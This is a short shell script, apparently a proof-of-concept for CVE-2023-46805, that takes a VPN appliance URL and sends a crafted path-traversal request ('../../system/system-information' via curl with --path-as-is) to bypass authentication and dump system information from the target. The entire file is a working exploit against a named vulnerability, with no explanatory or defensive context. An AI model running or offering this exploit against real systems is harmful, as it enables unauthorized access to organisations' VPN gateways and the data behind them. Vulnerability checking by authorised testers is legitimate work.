#!/bin/sh if [ "$#" -ne 1 ]; then echo "missing argument like:" echo "./CVE-2023-46805.sh https://my.vpn.ip:443" exit 1 fi curl -k -s --path-as-is -X GET "$1/api/v1/totp/user-backup-code/../../system/system-information" | json_pp